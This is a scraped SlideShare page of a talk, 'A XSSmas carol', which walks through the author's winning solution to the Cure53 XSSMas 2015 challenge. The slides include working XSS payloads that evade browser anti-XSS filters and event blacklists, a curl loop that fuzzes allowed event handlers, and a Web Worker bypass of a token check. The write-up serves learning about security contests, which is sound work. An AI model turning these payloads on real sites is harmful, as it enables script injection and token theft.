[Coscup 2012] JavascriptMVC
[Coscup 2012] JavascriptMVC[Coscup 2012] JavascriptMVC
[Coscup 2012] JavascriptMVCAlive Kuo
 
CSS3 Takes on the World
CSS3 Takes on the WorldCSS3 Takes on the World
CSS3 Takes on the WorldJonathan Snook
 
Enhance Web Performance
Enhance Web PerformanceEnhance Web Performance
Enhance Web PerformanceAdam Lu
 
! Modernizr v2.0.6 httpwww.modernizr.com Copyri.docx
! Modernizr v2.0.6 httpwww.modernizr.com Copyri.docx! Modernizr v2.0.6 httpwww.modernizr.com Copyri.docx
! Modernizr v2.0.6 httpwww.modernizr.com Copyri.docxMARRY7
 

Similar to A XSSmas carol (20)

Massimo Artizzu - The tricks of Houdini: a magic wand for the future of CSS -...
Massimo Artizzu - The tricks of Houdini: a magic wand for the future of CSS -...Massimo Artizzu - The tricks of Houdini: a magic wand for the future of CSS -...
Massimo Artizzu - The tricks of Houdini: a magic wand for the future of CSS -...
 
He stopped using for/while loops, you won't believe what happened next!
He stopped using for/while loops, you won't believe what happened next!He stopped using for/while loops, you won't believe what happened next!
He stopped using for/while loops, you won't believe what happened next!
 
#NewMeetup Performance
#NewMeetup Performance#NewMeetup Performance
#NewMeetup Performance
 
Aad Versteden | State-of-the-art web applications fuelled by Linked Data awar...
Aad Versteden | State-of-the-art web applications fuelled by Linked Data awar...Aad Versteden | State-of-the-art web applications fuelled by Linked Data awar...
Aad Versteden | State-of-the-art web applications fuelled by Linked Data awar...
 
HTML5 and CSS3 Shizzle
HTML5 and CSS3 ShizzleHTML5 and CSS3 Shizzle
HTML5 and CSS3 Shizzle
 
Is HTML5 Ready? (workshop)
Is HTML5 Ready? (workshop)Is HTML5 Ready? (workshop)
Is HTML5 Ready? (workshop)
 
Is html5-ready-workshop-110727181512-phpapp02
Is html5-ready-workshop-110727181512-phpapp02Is html5-ready-workshop-110727181512-phpapp02
Is html5-ready-workshop-110727181512-phpapp02
 
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...
 
Webpack
Webpack Webpack
Webpack
 
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
09 - express nodes on the right angle - vitaliy basyuk - it event 2013 (5)
 
Web performance essentials - Goodies
Web performance essentials - GoodiesWeb performance essentials - Goodies
Web performance essentials - Goodies
 
PostgreSQL Open SV 2018
PostgreSQL Open SV 2018PostgreSQL Open SV 2018
PostgreSQL Open SV 2018
 
Hidden Gems in Swift
Hidden Gems in SwiftHidden Gems in Swift
Hidden Gems in Swift
 
Svcc 2013-d3
Svcc 2013-d3Svcc 2013-d3
Svcc 2013-d3
 
SVCC 2013 D3.js Presentation (10/05/2013)
SVCC 2013 D3.js Presentation (10/05/2013)SVCC 2013 D3.js Presentation (10/05/2013)
SVCC 2013 D3.js Presentation (10/05/2013)
 
"Scala in Goozy", Alexey Zlobin
"Scala in Goozy", Alexey Zlobin "Scala in Goozy", Alexey Zlobin
"Scala in Goozy", Alexey Zlobin
 
[Coscup 2012] JavascriptMVC
[Coscup 2012] JavascriptMVC[Coscup 2012] JavascriptMVC
[Coscup 2012] JavascriptMVC
 
CSS3 Takes on the World
CSS3 Takes on the WorldCSS3 Takes on the World
CSS3 Takes on the World
 
Enhance Web Performance
Enhance Web PerformanceEnhance Web Performance
Enhance Web Performance
 
! Modernizr v2.0.6 httpwww.modernizr.com Copyri.docx
! Modernizr v2.0.6 httpwww.modernizr.com Copyri.docx! Modernizr v2.0.6 httpwww.modernizr.com Copyri.docx
! Modernizr v2.0.6 httpwww.modernizr.com Copyri.docx
 

Recently uploaded

Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...Matt Ray
 
What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....kzayra69
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Natan Silnitsky
 
Odoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 EnterpriseOdoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 Enterprisepreethippts
 
How to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion ApplicationHow to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion ApplicationBradBedford3
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxTier1 app
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaHanief Utama
 
Unveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesUnveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesŁukasz Chruściel
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtimeandrehoraa
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Andreas Granig
 
Best Web Development Agency- Idiosys USA.pdf
Best Web Development Agency- Idiosys USA.pdfBest Web Development Agency- Idiosys USA.pdf
Best Web Development Agency- Idiosys USA.pdfIdiosysTechnologies1
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...OnePlan Solutions
 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmSujith Sukumaran
 
PREDICTING RIVER WATER QUALITY ppt presentation
PREDICTING RIVER WATER QUALITY ppt presentationPREDICTING RIVER WATER QUALITY ppt presentation
PREDICTING RIVER WATER QUALITY ppt presentationvaddepallysandeep122
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWave PLM
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Velvetech LLC
 
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in NoidaBuds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in Noidabntitsolutionsrishis
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...Technogeeks
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureDinusha Kumarasiri
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024StefanoLambiase
 

Recently uploaded (20)

Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
 
What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
 
Odoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 EnterpriseOdoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 Enterprise
 
How to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion ApplicationHow to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion Application
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief Utama
 
Unveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesUnveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New Features
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtime
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024
 
Best Web Development Agency- Idiosys USA.pdf
Best Web Development Agency- Idiosys USA.pdfBest Web Development Agency- Idiosys USA.pdf
Best Web Development Agency- Idiosys USA.pdf
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalm
 
PREDICTING RIVER WATER QUALITY ppt presentation
PREDICTING RIVER WATER QUALITY ppt presentationPREDICTING RIVER WATER QUALITY ppt presentation
PREDICTING RIVER WATER QUALITY ppt presentation
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need It
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...
 
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in NoidaBuds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with Azure
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
 

A XSSmas carol

  • 1. A XSSmas carol by pepe vila
  • 2. whoami Name: Pepe Vila (@cgvwzq) Location: Spain Work: - before: pentester at EY - current: PhD student at IMDEA Software Interests: - try to understand browsers, XSS challenges, CTFs, computationalism, space exploration...
  • 3. whoami Name: Pepe Vila (@cgvwzq) == btoa("pepe").toLowerCase().replace(/[=+]/g,'') Location: Spain Work: - before: pentester at EY - current: PhD student at IMDEA Software Interests: - try to understand browsers, XSS challenges, CTFs, computationalism, space exploration...
  • 4. Official Write-up: https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2015 Summary ● index.php: xss w/o UI on <div> element ● token.php: bypass document.location JS check ● index2.php: Angular JS template injection ● index3.php: xss w/o UI on <p> element the challenge
  • 5. the challenge shortcut! Official Write-up: https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2015 Summary ● index.php: xss w/o UI on <div> element ● token.php: bypass document.location JS check ● index2.php: Angular JS template injection ● index3.php: xss w/o UI on <p> element
  • 6. what we know? Hints probably don’t help too much a priori. But after many some test & error we can learn: - Browser anti-XSS (on IE, Chrome and Opera) - token == sessionid => same token used everywhere - index3.php checks token and Referer header - requests to index.php and index3.php regenerate the sessionid - we don’t need to include the .php extension - paths after a valid resource are ignored on server side (e.g.: http://domain/index/foobar/ == http://domain/index.php )
  • 7. what we know? - index.php reflects $_GET[‘xss’] in <div class=’<INJECTION>’>·–·</div> … <script src="token.php?token= <TOKEN>&callback=document.write" ></script> use htmlentities, but we can escape the attribute context with single quotes - fortunately the <script> string is stripped, so we can bypass anti-XSS filters
  • 8. what we know? - index3.php checks Referer header (for the string “/index2.php”) and the token - if ok reflects $_GET[‘xss’] in <p class='<INJECTION>'></p> again with htmlentities, so we escape attribute context - no stripping this time, but some blacklisted events are replaced by “onend” - a CSS comment tell us to “get some ‘css’?” so we can inject also in <style> context
  • 9. what we know? - index3.php checks Referer header for the string “/index2.php” and for a valid token - if ok reflects $_GET[‘xss’] in <p class='<INJECTION>'></p> again with htmlentities, so we escape attribute context - no stripping this time, but some blacklisted events are replaced by “onend” - a CSS comment tell us to “get some ‘css’?” so we can inject also in <style> context
  • 10. ideas <div contenteditable id=x onfocus=alert(1)></div> + target (all but FF) vs. <div onbeforescriptexecute=alert(1)><script></script></div> (only FF) Firefox has no anti-XSS, but I couldn’t get execution on /index3.php :( And… onanimationstop is translated into onanimationend which is a valid event :) and because the replace XSS Auditor does not match :D
  • 11. ideas I also wrote a bash script to list all non-replaced events: #!/bin/bash TOKEN="$1" for i in $(cat events.txt); do curl -s -H "Cookie: PHPSESSID=${TOKEN}" -H "Referer: http://any/index2.php" "https://xssmas2015.cure53.co.uk/index3?token=${TOKEN}&xss='${i}=alert(1)" | grep '<p class' | grep -v "'onend" done What gave me some events to JSfiddle with: onafterscriptexecute,onariarequest,onautocomplete,onautocompleteerror,onbeforescriptexecute,onbeforeupdate,oncancel,onclose, oncommand,oncompassneedscalibration,oncuechange,ondevicelight,ondevicemotion,ondeviceorientation,ondeviceproximity,ondurationend, onfullscreenchange,onfullscreenerror,ongotpointercapture,onhashchange,oninput,onlanguagechange,onlostpointercapture, onmozfullscreenchange,onmozfullscreenerror,onmozpointerlockchange,onmozpointerlockerror,onmscontentzoom,onmsfullscreenchange, onmsfullscreenerror,onmsgesturechange,onmsgesturedoubletap,onmsgestureend,onmsgesturehold,onmsgesturestart,onmsgesturetap, onmsgotpointercapture,onmsinertiastart,onmslostpointercapture,onmsmanipulationstatechanged,onmspointercancel,onmspointerdown, onmspointerenter,onmspointerleave,onmspointermove,onmspointerout,onmspointerover,onmspointerup,onmssitemodejumplistitemremoved, onmsthumbnailclick,onpage,onpointercancel,onpointerdown,onpointerenter,onpointerleave,onpointerlockchange,onpointerlockerror, onpointermove,onpointerout,onpointerover,onpointerup,onpopstate,onratechange,onrowsdelete,onrowsinserted,onshow,ontoggle, onuserproximity,onwebkitfullscreenchange,onwebkitfullscreenerror, onwebkittransitionend* ,onwheel
  • 12. my first solution ?xss=’contenteditable+id=x+onfocus<script>=’ location=`index3?token=${all[55].src. substr(48)}%26css=@keyframes+x{%26xss=%2527style=animation-name: x+onanimationstop=alert(location)//index2.php `#x So in order to test the validity before starting the “shortening” contest, I submit the following: document.all[xx].src is the shortest* way to the token string: + We save the “document” because it’s in the scope of any event. + @keyframes+x{ we don’t even need to close the curly bracket - URL encoding is always ugly and expensive :S * I also tried innerHTML (9) instead of all[xx].src (11), but no luck. (cookie is also HTTP only)
  • 13. my first solution ?xss=’contenteditable+id=x+onfocus<script>=’ location=`index3?token=${all[55].src. substr(48)}%26css=@keyframes+x{%26xss=%2527style=animation-name: x+onanimationstop=alert(location)//index2.php `#x So in order to test the validity before starting the “shortening” contest, I submit the following: document.all[xx].src is the shortest* way to the token string: + We save the “document” because it’s in the scope of any event. + @keyframes+x{ we don’t even need to close the curly bracket - URL encoding is always ugly and expensive :S * I also tried innerHTML (9) instead of all[xx].src (11), but no luck. IDEA -> TEST & ERROR + REMEASURE 189
  • 14. warm up... ?xss=’tabindex=1+id=x+onfocus<script>=’ location=`index3${all[56].src.slice(41)}% 26css=*{animation:x}@keyframes+x{%26xss=%2527onanimationstop=alert(URL)//index2. php`#x With some improvements… + tabindex=1 also makes elements focusable + we can reuse the ?token= part from all[xx].src + slice (5) vs. substr (6) + General animation CSS property instead of animation-name + Move style attribute inside the CSS context *{animation:x} (14) vs. style=animation:x+ (18) + URL with document in scope makes document.URL :) 161 But the rest of the guys still ahead with ~150 bytes :(
  • 15. warm up x 2 ?xss=’tabindex=1+id=x+onfocus<script>=’ location=`index3/${all[56].src}%26css=* {animation:x}@keyframes+x{%26xss=%2527onanimationcut=alert(URL)//index2.php `#x An a couple more + No need to slice the token’s URL if we set it as path (same resource requested): /index3/http://xssmas2015.cure53.co.uk/token.php?token=<TOKEN>&callback=document.write equal to /index3?token=<TOKEN>&callback=document.write + Shortest replaced event is oncut, so onanimationoncut will become onanimationend :) * I actually bruteforced all possible 2 char combinations, just in case… -_-’ 151
  • 17. reorder you must ?xss=’id=x+onfocus<script>= location=`index3/index2.php${all[56].src}%26css=* {animation:x}@keyframesfx{%26xss=’onanimationcut=’alert(URL) `+tabindex=1#x + onfocus attribute doesn’t need quotes if we don’t break it with spaces BONUS: we can avoid the double URL encoding for the single quote :D + instead of URL encoding the space on the keyframe we can do better with f + moving /index2.php saves us 1 slash (we change the other one for an opening single quote) + tabindex=1’foobartrashhere is the only attribute that still works without an opening single quote 146
  • 18. JSFiddle results I created an HTML element with ~200 events [1] and played with different attribute combinations and styles. MDN, MSDN and similars are also very helpful. I had previously found ontransitionend, but I just ignored it since it was longer than my current solution, so I even did a tweet of it -_-’ However… At some point the ontransitionend event got fired without setting any CSS property WHY? :S [1] http://pastebin.com/raw/WwcBmz5J
  • 19. JSFiddle results Focusable elements “grow” and outline-width when focused. So… transition:1s will trigger a transition when we focus any focusable element. And we already know how to do that. + We are reusing the style, id and tabindex properties as well as the location.hash !! + Next steps? 145 ?xss=’onfocus<script>= location=`index3/index2.php${all[56].src}%26xss=’ onwebkittransitioncut=alert(URL)// ${URL}`+style=transition:1s+id=x+tabindex=1#x
  • 20. ‘onf$ck=’#asd!$@41 I got out of ideas many times. Different solutions but all the same length, dead paths, more dead paths… I was trying to reuse more parts of the first injection (tried with replace, slice and concatenation) but I couldn’t save too much :(
  • 22. 2paths1injection New idea and wrote Mario asking if getting an alert(URL) in both injection was valid, and he said YES. So I basically broke the Twitter barrier :) Using the same payload in both injections: + Note the extra “&” in order to concat the “xss” parameter + We need to put “oncut” at some place to cheat the anti-XSS. + The 0<script>1 will be syntactically correct but on the second page will throw an “not defined” exception. + XSS Auditor allows the stripped/replaced string to be in any place before “/” or “,” ?&xss=’style=transition:1s+id=x+tabindex=1+onwebkittransitionend=oncut=alert(URL) ||0<script>1,location=`index3/index2.php${all[56].src}${URL}`#x 139
  • 23. 2paths1injection And saved some more bytes.... ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: 0<script>1,location=`index3/index2.php${all[56].src}${URL}`+tabindex=1#x 137
  • 24. 2paths1injection And a few more... This one worth the creativity special prize :D ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: location=`<script>index3/index2.php${all[56].src}${URL}`+tabindex=1#x 134
  • 25. 2paths1injection And a few more... This one worth the creativity special prize :D But at the end they decided that clicking on the alert(URL) in the first injection was UI and it was against the rules. So... ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: location=`<script>index3/index2.php${all[56].src}${URL}`+tabindex=1#x 134
  • 26. 2paths1injection And a few more... This one worth the creativity special prize :D But at the end they decided that clicking on the alert(URL) in the first injection was UI and it was against the rules. So... BACK TO 145 :( ?&xss='style=transition:1s+id=x+onwebkittransitionend=alert(URL)?oncut: location=`<script>index3/index2.php${all[56].src}${URL}`+tabindex=1#x 145
  • 27. my first shortest solution Fortunately I was pretty sure that the idea could work, and after some more time in front of vim I got this: 141 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut=`<script>`-alert (URL)//`,location=`index3/index2.php${all[56].src}${URL}`+tabindex=1#x What in index.php was: ?&xss='style=transition:1s+id=x+onwebkittransitionend= oncut=``-alert(URL)//` , location=`index3/index2.php${all[56].src}${URL} `+tabindex=1#x And in index3.php: ?&xss='style=transition:1s+id=x+onwebkittransitionend=onend= `<script>`-alert (URL)//`,location=`index3/index2.php${all[56].src}${URL} `+tabindex=1#x ONLY ONE ALERT
  • 28. a little shorter 137 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=`index3/index2.php${all[57].src}${URL} `+tabindex=1#x + In index.php the condition will be an empty string, so it will take the second path and redirect + In index3.php we take the first one and alert for the glory and fame! :D
  • 29. a little shorter 137 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=`index3/index2.php${all[57].src}${URL} `+tabindex=1#x + In index.php the condition will be an empty string, so it will take the second path and redirect + In index3.php we take the first one and alert for the glory and fame! :D This was on January 12th, and I could rest until @molnar_g did 136 a week (a very long one indeed) before the end of contest.
  • 30. JS strings 101 135 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=[`index3/index2.php`,all[58].src,URL] +tabindex=1#x Fortunately I had forgotten a simple trick for concatenating strings, which saved me exactly the 2 bytes I needed: The winner vector
  • 31. JS strings 101 135 ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut= `<script>`?alert (URL):location=[`index3/index2.php`,all[58].src,URL] +tabindex=1#x Fortunately I had forgotten a simple trick for concatenating strings, which saved me exactly the 2 bytes I needed: ?&xss=/index2.php'style=transition: 1s+id=x+onwebkittransitionend=oncut=`<script>`?alert(URL):location=[/index3/,all [58].src,URL]+tabindex=1#x ?&xss=/index2.php'style=transition:1s+id=x+onwebkittransitionend=location=oncut= [`<script>`?alert(URL):/index3/,all[58].src,URL]+tabindex=1#x
  • 32. Jontransition & Co. A couple of days before the end of the contest this mysterious “guy” appeared in the scoreboard… ~.~ and @phiber told me that I was going to be defeated, driving me crazy. So I started thinking again trying to split, slice, replace the innerHTML in order to save 1 byte more by reusing the “transition” string from “Jontransition”. But I couldn’t improve the vector on that way, so I tried again some other paths...
  • 33. more ideas ?&xss='style=transition:1s+id=x+onwebkittransitionend=oncut=location= [`<script>index3/index2.php`, (all[60]||alert(URL)).src,URL]+tabindex=1#x Alternative 135 solution. ?&xss='style=transition:1s+id=x+onwebkittransitionend= x.oncut-1?location= [`<script>index3/index2.php`,all[60].src,URL] :alert(URL)+tabindex=1#x I thought this idea could save me a couple of bytes, but at the end I couldn’t :( Anyway it is interesting (136): + oncut == null vs. onend == undefined + +null == 0 vs. +undefined == NaN ... oncut-1 == -1 == true vs. undefined-1 == NaN == false
  • 34. the end At the end Jontransition didn’t make it (or did he? ~.^), and after several days of having fun, learning and suffering I was lucky enough to win :) I hope not having bored you too much, and that you have find at least something interesting... Congrats to the rest of the winners :) Also thanks to Mario, @mmrupp and @filedescriptor for organizing these contests and sharing their knowledge.
  • 36. bonus token.php + Server-side checks for the Referer (not empty & different than “xssmas2015.cure53.co.uk”) and for a valid token. + Client-side check: if (document.location.href == document.location.protocol + '//localhost' + location.pathname) callback({foo:”thesecret”}) Web Worker’s context allows to set the document and location properties and importScripts the file. document={location:{href:’//localhost’,protocol:’’}};location={pathname:’’};importScripts(‘https://xssmas2015. cure53.co.uk/token.php?token=<TOKEN>&callback=postMessage So that should bypass the client-side check and get the token for index2.php, but... + Chrome does not send Referer on Web Worker’s requests from Blob URLs (we need an external file). + Chrome neither sends cookies on cross-domain requests from a Web Worker (B req. A), unless the page B which created the Web Worker is loaded in a page-A’s iframe (dafuq :S is this in the spec?)